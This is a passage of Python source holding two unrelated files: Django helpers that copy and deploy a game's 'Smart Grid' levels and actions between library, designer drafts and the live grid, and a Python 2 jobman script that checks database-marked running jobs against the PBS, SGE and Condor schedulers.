# Replace each `sub_obj` with a duplicate.
if model not in collector.data:
continue
sub_objects = collector.data[model]
for obj in sub_objects:
for fk in fks:
fk_value = getattr(obj, "%s_id" % fk.name)
# If this FK has been duplicated then point to the duplicate.
fk_rel_to = data_snapshot[fk.rel.to]
if fk_value in fk_rel_to:
dupe_obj = fk_rel_to[fk_value]
setattr(obj, fk.name, dupe_obj)
# Duplicate the object and save it.
obj.id = None
if field is None or field != 'slug':
slug = obj.slug
obj.slug = slug + '-copy'
if field is not None:
setattr(obj, field, value)
obj.save()
if root_obj is None:
root_obj = obj
return root_obj
# pylint: enable=R0914
def check_designer_vs_library(draft):
"""Checks the slugs in the designer vs the library. Returns
list of slugs in designer not in library."""
l = []
for des_action in DesignerAction.objects.filter(draft=draft):
slug = des_action.slug
try:
get_library_action(slug)
except Http404:
l.append(slug)
return l
def is_library(obj):
"""Returns True if the object is a Library instance."""
cls = type(obj).__name__
return cls.startswith('Library')
def is_designer(obj):
"""Returns True if the object is a Designer instance."""
cls = type(obj).__name__
return cls.startswith('Designer')
def is_smartgrid(obj):
"""Returns True if the object is a SmartGrid instance."""
return not (is_library(obj) or is_designer(obj))
def _copy_fields(orig, copy):
"""Copies the field values from orig to copy and saves the copy."""
for f in orig._meta.fields:
if f.name != 'id':
value = getattr(orig, f.name)
setattr(copy, f.name, value)
copy.save()
def _copy_fields_no_foriegn_keys(orig, copy):
"""Copies the field values from orig to copy and saves the copy."""
fks = []
for f in orig._meta.fields:
if isinstance(f, ForeignKey):
fks.append(f.name)
# print fks
for f in orig._meta.fields:
if f.name != 'id' and not f.name in fks:
value = getattr(orig, f.name)
setattr(copy, f.name, value)
def _admin_link(action):
"""returns the hardcoded link to edit the action."""
return "<a href='/challenge_setting_admin/smartgrid_design/designer%s/%s/'>%s</a>" % \
(action.type, action.pk, action.name)
def __slug_has_copy_num(slug):
"""Returns True if the given slug has a copy number. Copy numbers are defined as slug-#."""
parts = slug.split('-')
last = parts[len(parts) - 1]
return last.isdigit()
def __get_copy_num(slug):
"""Returns the number at the end of the given slug (e.g. intro-video returns -1,
play-outside-cafe-1 returns 1."""
parts = slug.split('-')
last = parts[len(parts) - 1]
if last.isdigit():
return int(last)
else:
return -1
def __get_slug_wo_copy_num(slug):
"""Returns the slug prefix without the copy number. For slugs without copy numbers returns
the slug-."""
if __slug_has_copy_num(slug):
return slug[: slug.rfind('-') + 1]
else:
return "%s-" % slug
def __get_next_library_copy_slug(slug):
"""Returns the next available copy slug. Copy slugs have the copy_num appended to the slug
prefix."""
copy_num = __get_copy_num(slug)
slug_prefix = __get_slug_wo_copy_num(slug)
done = False
while not done:
try:
copy_num += 1
get_library_action('%s%d' % (slug_prefix, copy_num))
except Http404:
done = True
return '%s%d' % (slug_prefix, copy_num)
def __get_next_designer_copy_slug(draft, slug):
"""Returns the next available copy slug. Copy slugs have the copy_num appended to the slug
prefix."""
copy_num = __get_copy_num(slug)
slug_prefix = __get_slug_wo_copy_num(slug)
done = False
while not done:
try:
copy_num += 1
get_designer_action(draft, '%s%d' % (slug_prefix, copy_num))
except Http404:
done = True
return '%s%d' % (slug_prefix, copy_num)
def instantiate_designer_column_from_library(draft, slug):
"""Instantiates a DesignerColumnName from the LibraryColumnName with the given draft and
slug."""
lib_cat = get_object_or_404(LibraryColumnName, slug=slug)
des_col = None
try:
des_col = get_object_or_404(DesignerColumnName, draft=draft, slug=slug)
except Http404:
des_col = DesignerColumnName()
des_col.draft = draft
_copy_fields(lib_cat, des_col)
return des_col
def instantiate_designer_action_from_library(draft, slug):
"""Instantiates a Smart Grid Game Design instance from the Smart Grid Game Library instance.
draft is the draft to use. slug is the slug value for the library instance. If the Design
instance exists it is over written."""
lib_obj = get_library_action(slug)
action_type = lib_obj.type
exist_obj = None
try:
exist_obj = get_designer_action(draft, slug)
except Http404:
exist_obj = None
design_obj = None
if exist_obj == None:
if action_type == 'activity':
design_obj = DesignerActivity()
lib_obj = LibraryActivity.objects.get(slug=slug)
if action_type == 'commitment':
design_obj = DesignerCommitment()
lib_obj = LibraryCommitment.objects.get(slug=slug)
if action_type == 'event':
design_obj = DesignerEvent()
lib_obj = LibraryEvent.objects.get(slug=slug)
if action_type == 'filler':
design_obj = DesignerFiller()
design_obj.draft = draft
else: # use the existing instance.
design_obj = exist_obj
_copy_fields(lib_obj, design_obj)
# Copy all the LibraryTextPropmtQuestions
for question in LibraryTextPromptQuestion.objects.filter(libraryaction=lib_obj):
try:
des_obj = get_object_or_404(DesignerTextPromptQuestion, action=design_obj, \
question=question.question, answer=question.answer, \
draft=draft)
except Http404:
des_obj = DesignerTextPromptQuestion()
_copy_fields_no_foriegn_keys(question, des_obj)
des_obj.action = get_designer_action(draft, slug)
des_obj.draft = draft
des_obj.save()
return design_obj
def instantiate_designer_level_from_smartgrid(draft, slug):
"""Creates or over writes a DesignerLevel for the given designer draft and level slug."""
level = get_object_or_404(Level, slug=slug)
try:
des_level = get_object_or_404(DesignerLevel, draft=draft, slug=slug)
except Http404:
des_level = DesignerLevel()
des_level.draft = draft
_copy_fields(level, des_level)
return des_level
def instantiate_designer_column_from_smartgrid(draft, slug):
"""Creates a DesignerColumnName from the ColumnName with the given slug."""
col = get_object_or_404(ColumnName, slug=slug)
des_col = None
try:
des_col = get_object_or_404(DesignerColumnName, draft=draft, slug=slug)
except Http404:
des_col = DesignerColumnName()
des_col.draft = draft
_copy_fields(col, des_col)
return des_col
def instantiate_designer_action_from_smartgrid(draft, slug):
"""Creates a designer instance from the Smart Grid instance with the given draft."""
grid_obj = get_smartgrid_action(slug)
action_type = grid_obj.type
old_obj = None
try:
old_obj = get_designer_action(draft, slug)
except Http404:
old_obj = None
designer_obj = None
if old_obj == None:
if action_type == 'activity':
designer_obj = DesignerActivity()
if action_type == 'commitment':
designer_obj = DesignerCommitment()
if action_type == 'event':
designer_obj = DesignerEvent()
if action_type == 'filler':
designer_obj = DesignerFiller()
designer_obj.draft = draft
else:
designer_obj = old_obj
_copy_fields(grid_obj, designer_obj)
# Copy all the TextPropmtQuestions
for question in TextPromptQuestion.objects.filter(action=grid_obj):
try:
des_obj = get_object_or_404(DesignerTextPromptQuestion, action=designer_obj, \
question=question.question, answer=question.answer, \
draft=draft)
except Http404:
des_obj = DesignerTextPromptQuestion()
_copy_fields_no_foriegn_keys(question, des_obj)
des_obj.action = get_designer_action(draft, slug)
des_obj.draft = draft
des_obj.save()
return designer_obj
def instantiate_smartgrid_level_from_designer(des_level):
"""Creates a Smart Grid Level from the DesignerLevel."""
level = None
try:
level = get_smartgrid_level(des_level.slug)
except Http404:
level = Level()
_copy_fields(des_level, level)
return level
def instantiate_smartgrid_column_from_designer(des_col):
"""Creates a Smart Grid ColumnName from the DesignerColumnName."""
col = None
try:
col = get_smartgrid_column_name(des_col.slug)
except Http404:
col = ColumnName()
_copy_fields(des_col, col)
return col
def instantiate_smartgrid_action_from_designer(draft, slug):
"""Creates a Smart Grid instance from the designer instance."""
des_action = get_designer_action(draft, slug)
action_type = des_action.type
old_obj = None
try:
old_obj = get_smartgrid_action(slug)
except Http404:
old_obj = None
grid_action = None
if old_obj == None:
if action_type == 'activity':
grid_action = Activity()
if action_type == 'commitment':
grid_action = Commitment()
if action_type == 'event':
grid_action = Event()
if action_type == 'filler':
grid_action = Filler()
else:
grid_action = old_obj
_copy_fields_no_foriegn_keys(des_action, grid_action)
grid_action.save()
# Copy all the DesignerTextPropmtQuestions
for question in DesignerTextPromptQuestion.objects.filter(draft=draft, action=des_action):
old_ques = TextPromptQuestion.objects.filter(action=grid_action, \
question=question.question, \
answer=question.answer)
if len(old_ques) == 0:
tqp = TextPromptQuestion(action=grid_action, question=question.question, \
answer=question.answer)
tqp.save()
return grid_action
def copy_library_action(slug):
"""Copies the LibraryAction with the given slug."""
action = get_library_action(slug)
action_type = action.type
if action_type == 'activity':
obj = LibraryActivity()
elif action_type == 'commitment':
obj = LibraryCommitment()
elif action_type == 'event':
obj = LibraryEvent()
_copy_fields(action, obj)
copy_slug = __get_next_library_copy_slug(slug)
obj.slug = copy_slug
obj.pk = None
obj.id = None
obj.save()
# Copy all the LibraryTextPropmtQuestions
for question in LibraryTextPromptQuestion.objects.filter(libraryaction=action):
try:
des_obj = get_object_or_404(LibraryTextPromptQuestion, action=obj, \
question=question.question, answer=question.answer)
except Http404:
des_obj = LibraryTextPromptQuestion()
_copy_fields_no_foriegn_keys(question, des_obj)
des_obj.action = obj
des_obj.save()
return obj
def copy_draft(from_draft, to_draft):
"""Copies all the items in from_draft to copy_draft."""
# print "copy_draft(%s, %s)" % (from_draft, to_draft)
clear_designer(to_draft)
# levels
for level in DesignerLevel.objects.filter(draft=from_draft):
copy = DesignerLevel(draft=to_draft)
_copy_fields_no_foriegn_keys(level, copy)
copy.save()
# ColumnNames
for column in DesignerColumnName.objects.filter(draft=from_draft):
copy = DesignerColumnName(draft=to_draft)
_copy_fields_no_foriegn_keys(column, copy)
copy.save()
# DesignerColumnGrid
for loc in DesignerColumnGrid.objects.filter(draft=from_draft):
level = get_designer_level(to_draft, loc.level.slug)
column = get_designer_column_name(to_draft, loc.name.slug)
copy = DesignerColumnGrid(draft=to_draft, name=column, level=level)
_copy_fields_no_foriegn_keys(loc, copy)
copy.save()
# DesignerActions
for action in DesignerAction.objects.filter(draft=from_draft):
action = get_designer_action(from_draft, action.slug)
if action.type == 'activity':
copy = DesignerActivity(draft=to_draft)
elif action.type == 'commitment':
copy = DesignerCommitment(draft=to_draft)
elif action.type == 'event':
copy = DesignerEvent(draft=to_draft)
_copy_fields_no_foriegn_keys(action, copy)
copy.save()
# Copy all the DesignerTextPropmtQuestions
for question in DesignerTextPromptQuestion.objects.filter(action=action, draft=from_draft):
des_obj = DesignerTextPromptQuestion(action=copy, draft=to_draft)
_copy_fields_no_foriegn_keys(question, des_obj)
des_obj.save()
# DesignerGrid
for loc in DesignerGrid.objects.filter(draft=from_draft):
level = get_designer_level(to_draft, loc.level.slug)
action = get_designer_action(to_draft, loc.action.slug)
copy = DesignerGrid(level=level, draft=to_draft, action=action)
_copy_fields_no_foriegn_keys(loc, copy)
copy.save()
return to_draft
def copy_designer_action(draft, slug):
"""Copies the DesignerAction with the given slug."""
action = get_designer_action(draft, slug)
action_type = action.type
if action_type == 'activity':
obj = DesignerActivity()
elif action_type == 'commitment':
obj = DesignerCommitment()
elif action_type == 'event':
obj = DesignerEvent()
_copy_fields(action, obj)
copy_slug = __get_next_designer_copy_slug(draft, slug)
obj.slug = copy_slug
obj.pk = None
obj.id = None
obj.save()
# Copy all the DesignerTextPropmtQuestions
for question in DesignerTextPromptQuestion.objects.filter(action=action, draft=draft):
des_obj = DesignerTextPromptQuestion()
_copy_fields_no_foriegn_keys(question, des_obj)
des_obj.action = obj
des_obj.draft = draft
des_obj.save()
return obj
def get_designer_action(draft, slug):
"""Returns the Smart Grid Game Designer Action for the given draft and slug or throws
Http404 exception if the DesignerAction doesn't exist."""
action = get_object_or_404(DesignerAction, draft=draft, slug=slug)
if action.type == 'activity':
return DesignerActivity.objects.get(draft=draft, slug=slug)
if action.type == 'commitment':
return DesignerCommitment.objects.get(draft=draft, slug=slug)
if action.type == 'event':
return DesignerEvent.objects.get(draft=draft, slug=slug)
if action.type == 'filler':
return DesignerFiller.objects.get(draft=draft, slug=slug)
return action
def get_designer_action_slugs(draft):
"""Returns the DesignerAction slugs that are currently in the Smart Grid Designer
for the given draft. This includes the actions in the palette."""
action_list = []
for action in DesignerAction.objects.filter(draft=draft):
action_list.append(action.slug)
return action_list
def get_designer_column_name(draft, slug):
"""Return the Smart Grid Game DesignerColumnName for the given slug."""
return get_object_or_404(DesignerColumnName, draft=draft, slug=slug)
def get_designer_column_name_slugs(draft):
"""Returns the DesignerColumnName slugs that are currently in the Smart Grid Designer."""
slugs = []
for col in DesignerColumnGrid.objects.filter(draft=draft):
slugs.append(col.name.slug)
return slugs
def get_designer_draft(slug):
"""Returns the Draft for the given slug or Http404 exception."""
return get_object_or_404(Draft, slug=slug)
def get_designer_level(draft, slug):
"""Return the DesignerLevel for the given slug."""
return get_object_or_404(DesignerLevel, draft=draft, slug=slug)
def get_designer_levels(draft):
"""Return a list of the DesignerLevels for the given draft."""
return DesignerLevel.objects.filter(draft=draft)
def get_designer_test_levels(draft, user):
"""Returns a list of DesignerLevels with their unlock conditions set according to the
test predicates."""
levels = []
for level in Level.objects.all():
level.is_unlock = predicate_mgr.eval_play_tester_predicates(level.unlock_condition,
user, draft)
levels.append(level)
return levels
def get_library_action(slug):
"""Returns the Smart Grid Game Library Action for the given slug."""
action = get_object_or_404(LibraryAction, slug=slug)
if action.type == 'activity':
return LibraryActivity.objects.get(slug=slug)
if action.type == 'commitment':
return LibraryCommitment.objects.get(slug=slug)
if action.type == 'event':
return LibraryEvent.objects.get(slug=slug)
return action
def get_library_column_name(slug):
"""Return the Smart Grid Game LibraryColumnName for the given slug."""
return get_object_or_404(LibraryColumnName, slug=slug)
def get_smartgrid_action(slug):
"""returns the action object by slug."""
action = get_object_or_404(Action, slug=slug)
if action.type == 'activity':
return Activity.objects.get(slug=slug)
if action.type == 'commitment':
return Commitment.objects.get(slug=slug)
if action.type == 'event':
return Event.objects.get(slug=slug)
if action.type == 'filler':
return Filler.objects.get(slug=slug)
return action
def get_smartgrid_action_slugs():
"""Returns the Actions that are currently in the Smart Grid."""
action_list = []
for grid in Grid.objects.all():
if grid.action.slug not in action_list:
action_list.append(grid.action.slug)
return action_list
def get_smartgrid_column_name(slug):
"""returns the ColumnName object by slug."""
return get_object_or_404(ColumnName, slug=slug)
def get_smartgrid_level(slug):
"""Returns the Level for the given slug."""
return get_object_or_404(Level, slug=slug)
def get_smartgrid():
"""Returns the currently defined smart grid."""
levels = []
return levels
def get_designer_grid(draft):
"""Returns the smart grid as defined in the Smart Grid Designer. The
grid is a list of lists with the format [<DesignerLevel>, [<DesignerColumnName>*],
[<DesignerAction>*], [active columns]"""
ret = []
for level in DesignerLevel.objects.filter(draft=draft):
level_ret = []
level_ret.append(level)
level_ret.append(DesignerColumnGrid.objects.filter(draft=draft, level=level))
level_ret.append(DesignerGrid.objects.filter(draft=draft, level=level))
columns = []
for cat in level_ret[1]:
if cat.column not in columns:
columns.append(cat.column)
for act in level_ret[2]:
if act.column not in columns:
columns.append(act.column)
level_ret.append(columns)
ret.append(level_ret)
return ret
def get_designer_palette(draft):
"""Returns the DesignerActions with no Level or no Column. These actions will not
appear in the grid if published."""
palette = []
for action in DesignerAction.objects.filter(draft=draft):
if len(DesignerGrid.objects.filter(action=action)) == 0:
palette.append(action)
return palette
def clear_designer(draft):
"""Deletes all the instances in the designer draft. Only do this rarely."""
# print "clear_designer(%s)" % draft
for obj in DesignerLevel.objects.filter(draft=draft):
obj.delete()
for obj in DesignerColumnName.objects.filter(draft=draft):
obj.delete()
for obj in DesignerAction.objects.filter(draft=draft):
obj.delete()
for obj in DesignerColumnGrid.objects.filter(draft=draft):
obj.delete()
for obj in DesignerGrid.objects.filter(draft=draft):
obj.delete()
def __clear_drafts():
"""Deletes all the Drafts and their objects. This includes the Draft 'None'."""
for draft in Draft.objects.all():
draft.delete()
clear_designer(draft=None)
def copy_smartgrid_to_designer(draft):
"""Copies the current Smart Grid Game to the given designer draft."""
# Clear out the Designer
clear_designer(draft)
# Copy the levels
for lvl in Level.objects.all():
try:
des_lvl = get_object_or_404(DesignerLevel, draft=draft, slug=lvl.slug)
except Http404:
des_lvl = DesignerLevel()
des_lvl.draft = draft
_copy_fields(lvl, des_lvl)
# Copy the ColumnNames
for col in ColumnName.objects.all():
try:
des_col = get_object_or_404(DesignerColumnName, draft=draft, slug=col.slug)
except Http404:
des_col = DesignerColumnName()
des_col.draft = draft
_copy_fields(col, des_col)
# Copy the location information
for grid in ColumnGrid.objects.all():
col = DesignerColumnGrid()
col.level = get_designer_level(draft, grid.level.slug)
col.column = grid.column
col.name = get_designer_column_name(draft, grid.name.slug)
col.draft = draft
col.save()
# Copy the Actions
for action in Action.objects.all():
instantiate_designer_action_from_smartgrid(draft, action.slug)
# Copy the location information
for grid in Grid.objects.all():
loc = DesignerGrid()
loc.level = get_designer_level(draft, grid.level.slug)
loc.column = grid.column
loc.row = grid.row
loc.action = get_designer_action(draft, grid.action.slug)
loc.draft = draft
loc.save()
def clear_smartgrid():
"""Removes all the location information for the Smart Grid.
Deletes the existing levels. Does not affect the Smart Grid Actions."""
for level in Level.objects.all():
level.delete()
for col in ColumnName.objects.all():
col.delete()
for row in ColumnGrid.objects.all():
row.delete()
for row in Grid.objects.all():
row.delete()
def deploy_designer_to_smartgrid(draft, use_filler): # pylint: disable=R0914
"""Clears the current Smart Grid Game and copies the designer instances to the
Smart Grid Game. Clearing the grid does not delete the actions just clears their
Levels and Categories."""
clear_smartgrid()
# deploy the Levels
for level in DesignerLevel.objects.filter(draft=draft):
instantiate_smartgrid_level_from_designer(level)
# deploy the ColumnNames
for col in DesignerColumnName.objects.filter(draft=draft):
instantiate_smartgrid_column_from_designer(col)
# deploy the actions
for action in DesignerAction.objects.filter(draft=draft):
instantiate_smartgrid_action_from_designer(draft, action.slug)
# set the ColumnGrid objects.
for des_col in DesignerColumnGrid.objects.filter(draft=draft):
col = ColumnGrid()
col.column = des_col.column
col.level = get_smartgrid_level(des_col.level.slug)
col.name = get_smartgrid_column_name(des_col.name.slug)
col.save()
# set the Grid objects.
for des_row in DesignerGrid.objects.filter(draft=draft):
row = Grid()
row.row = des_row.row
row.column = des_row.column
row.level = get_smartgrid_level(des_row.level.slug)
row.action = get_smartgrid_action(des_row.action.slug)
row.save()
if use_filler:
# need to instantiate the filler objects and put them in the grid.
filler_count = len(Filler.objects.all())
sizes = get_smart_grid_size()
for slug in list(sizes):
level = Level.objects.get(slug=slug)
for c in range(1, sizes[slug][0] + 1):
for r in range(1, sizes[slug][1] + 1):
cell = Grid.objects.filter(level=level, column=c, row=r)
if not cell:
filler_count += 1
name = 'Filler %s' % filler_count
filler_slug = 'filler-%s' % filler_count
filler = Filler(name=name, slug=filler_slug, type='filler', title=name)
filler.save()
grid = Grid(level=level, column=c, row=r, action=filler)
grid.save() # pylint: enable=R0914
def get_smart_grid_size():
"""Returns the maximum columns and rows for each level in the smartgrid as a dictionary with
the keys being the level slug and values being [num_column, num_row]."""
ret = {}
for level in Level.objects.all():
num_column = 0
for grid in ColumnGrid.objects.filter(level=level):
if grid.column > num_column:
num_column = grid.column
num_row = 0
for grid in Grid.objects.filter(level=level):
if grid.column > num_column:
num_column = grid.column
if grid.row > num_row:
num_row = grid.row
ret[level.slug] = [num_column, num_row]
return ret
def is_diff_between_designer_and_grid_action(draft, action_slug):
"""Returns True if there is a difference between the Designer Action and
Grid Action with the given slug."""
grid = get_smartgrid_action(action_slug)
fks = []
for f in grid._meta.fields:
if isinstance(f, ForeignKey):
fks.append(f.name)
designer = get_designer_action(draft, action_slug)
for f in grid._meta.fields:
if f.name in fks:
if not f.name.endswith('_ptr'):
grid_val = getattr(grid, f.name).name
designer_val = getattr(designer, f.name).name
if grid_val != designer_val:
return True
elif f.name != 'id':
grid_val = getattr(grid, f.name)
designer_val = getattr(designer, f.name)
if grid_val != designer_val:
return True
return False
def diff_between_designer_and_grid_action(draft, action_slug): # pylint: disable=R0912
"""Returns a list of the fields that are different between the Designer Action and
Grid Action with the given slug."""
grid = None
designer = None
t = 'action'
try:
designer = get_designer_action(draft, action_slug)
t = designer.type
grid = get_smartgrid_action(action_slug)
t = grid.type
fks = []
for f in grid._meta.fields:
if isinstance(f, ForeignKey):
fks.append(f.name)
except Http404:
if grid == None:
return ['is new ' + t + ' in grid']
if designer == None:
return ['not in designer but is in grid']
diff = []
for f in grid._meta.fields:
if f.name in fks:
if not f.name.endswith('_ptr'):
grid_val = getattr(grid, f.name)
if grid_val:
grid_val = grid_val.name
designer_val = getattr(designer, f.name)
if designer_val:
designer_val = designer_val.name
if grid_val != designer_val:
diff.append(f.name)
elif f.name != 'id':
grid_val = getattr(grid, f.name)
designer_val = getattr(designer, f.name)
if grid_val != designer_val:
diff.append(f.name)
des_loc = DesignerGrid.objects.filter(action=designer)
grid_loc = Grid.objects.filter(action=grid)
if len(des_loc) == 1 and len(grid_loc) == 1:
if des_loc[0].level.slug != grid_loc[0].level.slug:
diff.append("moved from level %s to %s" % (grid_loc[0].level, des_loc[0].level))
if des_loc[0].column != grid_loc[0].column:
diff.append("column changed from %s to %s" % (grid_loc[0].column, des_loc[0].column))
if des_loc[0].row != grid_loc[0].row:
diff.append("row changed from %s to %s" % (grid_loc[0].row, des_loc[0].row))
if len(des_loc) == 1 and len(grid_loc) == 0:
diff.append("moved to %s from the palette" % des_loc[0].get_loc_str())
if len(des_loc) == 0 and len(grid_loc) == 1:
diff.append("moved out of the grid to the palette")
return diff # pylint: enable=R0912
def diff_between_designer_and_grid(draft):
"""Returns a list of the action slugs and the changes for those slugs between the
designer actions and smartgrid actions."""
ret = []
for action in DesignerAction.objects.filter(draft=draft):
slug = action.slug
diff = diff_between_designer_and_grid_action(draft, slug)
if len(diff) > 0:
inner = []
inner.append(_admin_link(action))
inner.append(diff)
ret.append(inner)
return ret
def load_example_grid(draft, example_name):
"""Loads the Designer with the given example grid. If example_name doesn't exist, nothing
is changed."""
# print "load_example_grid(%s, %s)" % (draft, example_name)
# manage_py = script_utils.manage_py_command()
# manage_command = "python " + manage_py
fixture_path = "fixtures"
loaded = False
# Check to see if there is an example.
for name in os.listdir(fixture_path):
if name.startswith(example_name) and name.endswith("_designer.json"):
# examples exists so clear the designer
clear_designer(draft)
# load the example
fixture = os.path.join(fixture_path, name)
call_command('loaddata', '-v 0', fixture)
loaded = True
# os.system("%s loaddata -v 0 %s" % (manage_command, fixture))
if loaded:
# Need to copy everything from None to the draft
copy_draft(from_draft=None, to_draft=draft)
# clear_designer(draft=None)
|
|
from subprocess import Popen, PIPE
import os
import re
import time
from optparse import OptionParser
import sql
from runner import runner_registry
from tools import UsageError
from api0 import open_db
parse_check = OptionParser(usage='%prog check <tablepath> ',
add_help_option=False)
def str_time(run_time):
run_time = "%dd %dh%dm%ds" % (run_time / (24 * 3600),
run_time % (24 * 3600) / 3600,
run_time % 3600 / 60,
run_time % 60)
return run_time
def check_running_pbs_jobs(r, now):
""" Verify jobs on Torque/PBS system"""
p = Popen('qstat -x %s' % r['jobman.sql.pbs_task_id'],
shell=True, stdout=PIPE, stderr=PIPE)
ret = p.wait()
out = p.stdout.read()
if len(out) == 0:
print ("E: Job %d marked as PBS job '%s',"
" but 'qstat' don't know it." % (
r.id, r['jobman.sql.pbs_task_id']))
return
run_time = str_time(now - r["jobman.sql.start_time"])
# check runtime
#<walltime>48:00:00</walltime>
ressource_str = re.search('<Resource_List>.*</Resource_List>',
out).group(0)
walltime_str = re.search('<walltime>.*?</walltime>', ressource_str)
walltime_str = walltime_str.group(0)[10:-11]
assert walltime_str[2] == ':' and walltime_str[5] == ':'
walltime = (int(walltime_str[:2]) * 60 * 60 +
int(walltime_str[3:5]) * 60 +
int(walltime_str[-2:]))
if now - int(r["jobman.sql.start_time"]) > walltime:
print ("W: Job %d is running for more then the specified"
" max time of %s. Run time %s" % (
r.id, walltime_str, run_time))
# check state
#<job_state>R</job_state>
state_str = re.search('<job_state>.*</job_state>', out).group(0)[11:-12]
if state_str == "R":
pass
elif state_str == "Q":
print ("E: Job %d is running in the db on pbs with job id %s, but it"
" is in the pbs queue. Run time %s" % (
r.id, r["jobman.sql.pbs_task_id"], run_time))
elif state_str == "C":
print ("W: Job %d is running in the db, but it is marked as completed"
" in the pbs queue. This can be synchonization issue. Retry in"
" 1 minutes. Run time %s." % (r.id, run_time))
else:
print ("W: Job %d is running in the db, but we don't understand the"
" state in the queue '%s'" % (r.id, state_str))
def check_running_sge_jobs(r, now):
p = Popen('qstat', shell=True, stdout=PIPE)
ret = p.wait()
lines = p.stdout.readlines()
"""
qstat output:
job-ID prior name user state submit/start at queue slots ja-task-ID
-----------------------------------------------------------------------------------------------------------------
776410 0.50000 dbi_6a5f45 bastienf r 10/18/2010 13:26:46 smp@r106-n72 1 1
776410 0.50000 dbi_6a5f45 bastienf r 10/18/2010 13:26:46 smp@r106-n72 1 2
776415 0.00000 dbi_5381a1 bastienf qw 10/18/2010 13:30:21 1 1,2
"""
if len(lines) == 0:
print "E: Job %d marked as a SGE job, but `qstat` on this host tell that their is no job running." % r.id
return
assert lines[
0] == 'job-ID prior name user state submit/start at queue slots ja-task-ID \n'
assert lines[
1] == '-----------------------------------------------------------------------------------------------------------------\n'
run_time = str_time(now - r["jobman.sql.start_time"])
if now - int(r["jobman.sql.start_time"]) > (24 * 60 * 60):
print "W: Job %d is running for more then 24h. The current colosse max run time is 24h. Run time %s" % (r.id, run_time)
found = False
for line in lines[2:]:
sp = line.split()
ta_sp = sp[9].split(',')
if len(sp) != 10:
print "W: Job %d. Don't understant one line of qstat output's. Can't tell reliably if it is still running or not" % r.id
print "qstat output: ", line
if (sp[0] == r["jobman.sql.job_id"] and
r["jobman.sql.sge_task_id"] in ta_sp):
if sp[4] == 'r':
pass
elif sp[4] == 'qw':
print "E: Job %d is running in the db on sge with job id %s and task id %s, but it is waiting in the sge queue. Run time %s" % (
r.id, r["jobman.sql.job_id"],
r["jobman.sql.sge_task_id"], run_time)
elif sp[4] == 't':
print "W: Job %d is running in the db, but it is marked as ended in the sge queue. This can be synchonization issue. Retry in 1 minutes. Run time %s." % (
r.id, run_time)
else:
print "W: Job %d is running in the db and in the sge queue, but we don't understant the state it is in the queue:", sp[4]
found = True # in the sge queue
break
if not found:
print "E: Job %d marked as running in the db on sge with job id %s and task id %s, but not in sge queue. Run time %s." % (
r.id, r["jobman.sql.job_id"],
r["jobman.sql.sge_task_id"], run_time)
def check_serve(options, dbdescr):
"""Check that all jobs marked as running in the db are marked as
running in some cluster jobs scheduler.
print jobs that could have crashed/been killed ...
Example usage:
jobman check <tablepath>
"""
db = open_db(dbdescr, serial=True)
try:
session = db.session()
q = db.query(session)
idle = q.filter_eq('jobman.status', 0).all()
running = q.filter_eq('jobman.status', 1).all()
finished = q.filter_eq('jobman.status', 2).all()
err_start = q.filter_eq('jobman.status', 3).all()
err_sync = q.filter_eq('jobman.status', 4).all()
err_run = q.filter_eq('jobman.status', 5).all()
canceled = q.filter_eq('jobman.status', -1).all()
info = []
print ("I: number of job by status (%d:START, %d:RUNNING, %d:DONE,"
" %d:ERR_START, %d:ERR_SYNC, %d:ERR_RUN, %d:CANCELED)"
" in the db (%d:TOTAL)" % (len(idle), len(running),
len(finished), len(err_start),
len(err_sync), len(err_run),
len(canceled), len(q.all())))
print
# warn about job in error status
if len(err_start):
print "E: The following jobs had an error when starting them",
print [j.id for j in err_start]
if len(err_sync):
print "E: The following jobs had an error while doing the rsync",
print [j.id for j in err_sync]
if len(err_run):
print "E: The following jobs had an error while running",
print [j.id for j in err_run]
print
# check not 2 jobs in same slot+host
host_slot = {}
now = time.time()
# check job still running
for idx, r in enumerate(running):
condor_job = False
sge_job = False
pbs_job = False
# find the backend used for the job.
if ("jobman.sql.condor_slot" in r.keys() and
r["jobman.sql.condor_slot"] != "no_condor_slot"):
condor_job = True
if "jobman.sql.sge_task_id" in r.keys():
sge_job = True
if "jobman.sql.pbs_task_id" in r.keys():
pbs_job = True
if (sge_job + condor_job + pbs_job) > 1:
print "W: Job %d have info such that it run on condor, sge and/or pbs. We can't determine the good one."
continue
if not (sge_job or condor_job or pbs_job):
print "W: Job %d don't have condor, sge or pbs info attached to it. We can't determine if it is still running on the cluster. Old jobman to started the job?" % r.id
continue
# check that the job is still running.
if sge_job:
check_running_sge_jobs(r, now)
continue
if pbs_job:
check_running_pbs_jobs(r, now)
continue
if not condor_job:
print "W: Job %d is running but don't have the information needed to check if they still run on the jobs scheduler condor/pbs/torque/sge. Possible reasons: the job started with an old version of jobman or on another jobs scheduler." % r.id
continue
# We suppose the jobs started on condor.
try:
h = r["jobman.sql.host_name"]
s = r["jobman.sql.condor_slot"]
except KeyError, e:
print "W: Job %d is running but don't have needed info to check them again condor. Possible reaons: the job started with an old version of jobman or without condor." % r.id
continue
st = s + '@' + h
if host_slot.has_key(st):
try:
t0 = str_time(
now - running[host_slot[st]]["jobman.sql.start_time"])
except KeyError:
t0 = 'NO_START_TIME'
try:
t1 = str_time(now - r["jobman.sql.start_time"])
except KeyError:
t1 = 'NO_START_TIME'
print 'E: Job %d and Job %d are running on the same condor slot/host combination. running time: %s and %s' % (running[host_slot[st]].id, r.id, t0, t1)
else:
host_slot[st] = idx
gjid = None
if "jobman.sql.condor_global_job_id" in r.keys():
gjid = r["jobman.sql.condor_global_job_id"]
elif "jobman.sql.condor_GlobalJobId" in r.keys():
gjid = r["jobman.sql.condor_GlobalJobId"]
if gjid is not None:
submit_host = gjid.split('#')[0]
#import pdb;pdb.set_trace()
# take care of the quotation, condor resquest that "" be used
# around string.
cmd = "condor_q -name %s -const 'GlobalJobId==\"%s\"' -format '%%s' 'JobStatus'" % (
submit_host, gjid)
p = Popen(cmd, shell=True, stdout=PIPE)
ret = p.wait()
lines = p.stdout.readlines()
if ret == 127 and len(lines) == 0:
print "W: Job %d. condor_q failed. Is condor installed on this computer?" % r.id
continue
if len(lines) == 0:
print "E: Job %d is marked as running in the bd on this condor jobs %s, but condor tell that this jobs is finished" % (r.id, gjid)
continue
elif len(lines) == 1:
# condor unexpanded??? What should we do?
if lines[0] == '0':
print "E: Job %d is marked as running in the db, but its condor submited job is marked as unexpanded. We don't know what that mean, so we use an euristic to know if the jobs is still running." % r.id
elif lines[0] == '1': # condor idle
print "E: Job %d is marked as running in the db, but its condor submited job is marked as idle. This can mean that the computer that was running this job crashed." % r.id
continue
elif lines[0] == '2': # condor running
continue
elif lines[0] == '3': # condor removed
